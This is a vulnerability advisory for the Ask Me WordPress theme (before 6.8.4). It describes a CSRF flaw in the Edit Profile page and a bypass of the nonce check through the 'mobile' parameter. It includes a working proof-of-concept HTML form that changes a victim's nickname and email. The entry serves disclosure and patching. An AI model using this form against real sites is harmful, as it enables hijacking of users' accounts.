Themes Vulnerabilities
Ask Me < 6.8.4 - CSRF in Edit Profile
Description
The theme does not perform nonce checks when processing POST requests to the Edit Profile page, allowing an attacker to trick a user to change their profile information by sending a crafted request.
Version 6.8.2 introduced nonce checks, but these are bypassed when the 'mobile' parameter is passed as well.
Proof of Concept
<html> <body> <form action="https://example.com/edit-profile/" method="POST" enctype="multipart/form-data"> <input type="hidden" name="nickname" value="Evil Ottar" /> <input type="hidden" name="email" value="dr.evil@example.com" /> <input type="hidden" name="user_action" value="edit_profile" /> <!-- Version 6.8.2 introduces a nonce, but checking it is bypassed if 'mobile' is not empty. --> <input type="hidden" name="mobile" value="1" /> <input type="submit" value="Save" /> </form> </body> </html>
Affects Themes
Fixed in 6.8.4
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScan team
Submitter
Harald Eilertsen
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-08-01 (about 1 years ago)
Added
2022-08-01 (about 1 years ago)
Last Updated
2023-04-30 (about 1 years ago)